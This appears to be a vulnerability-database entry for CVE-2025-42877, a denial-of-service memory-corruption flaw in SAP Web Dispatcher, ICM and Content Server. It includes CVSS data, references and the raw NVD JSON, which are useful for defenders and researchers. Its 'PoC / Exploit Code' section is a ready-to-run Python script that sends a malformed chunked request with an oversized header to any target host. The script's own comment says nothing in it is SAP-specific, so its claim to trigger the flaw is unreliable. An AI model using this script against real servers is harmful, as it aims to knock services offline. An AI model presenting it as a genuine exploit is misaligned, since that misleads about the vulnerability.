Security Vulnerability Report
CVE-2025-42877 CVSS 7.5 HIGH

CVE-2025-42877

Published: 2025-12-09 16:17:52
Last Modified: 2026-04-15 00:35:42

Description

SAP Web Dispatcher, Internet Communication Manager (ICM), and SAP Content Server allow an unauthenticated user to exploit logical errors that lead to a memory corruption vulnerability. This results in high impact on the availability with no impact on confidentiality or integrity of the application.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

SAP Web Dispatcher (specific affected versions: see the official SAP advisory)
SAP Internet Communication Manager (ICM) (specific affected versions: see the official SAP advisory)
SAP Content Server (specific affected versions: see the official SAP advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import sys


def send_malicious_request(target_ip, target_port, path='/'):
    """Send a crafted HTTP request to trigger memory corruption"""
    # Crafted request with malformed headers.
    # Note: this is a generic chunked GET with an oversized header; nothing in
    # the request is specific to the SAP components named in this record.
    payload = f"GET {path} HTTP/1.1\r\n"
    payload += "Host: " + target_ip + "\r\n"
    payload += "Transfer-Encoding: chunked\r\n"
    payload += "X-Forwarded-For: " + "A" * 1000 + "\r\n"
    payload += "\r\n"
    payload += "0\r\n\r\n"          # zero-length terminating chunk
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        # sendall() loops until the whole buffer is written; send() may write only part of it
        sock.sendall(payload.encode())
        print(f"[+] Malicious request sent to {target_ip}:{target_port}")
        sock.close()
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_ip> <port>")
        sys.exit(1)
    target = sys.argv[1]
    port = int(sys.argv[2])
    send_malicious_request(target, port)

References

https://me.sap.com/notes/3677544
https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-42877",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-09T16:17:52.043",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "SAP Web Dispatcher, Internet Communication Manager (ICM), and SAP Content Server allow an unauthenticated user to exploit logical errors that lead to a memory corruption vulnerability. This results in high impact on the availability with no impact on confidentiality or integrity of the application."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-787"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://me.sap.com/notes/3677544",
        "source": "[email protected]"
      },
      {
        "url": "https://url.sap/sapsecuritypatchday",
        "source": "[email protected]"
      }
    ]
  }
}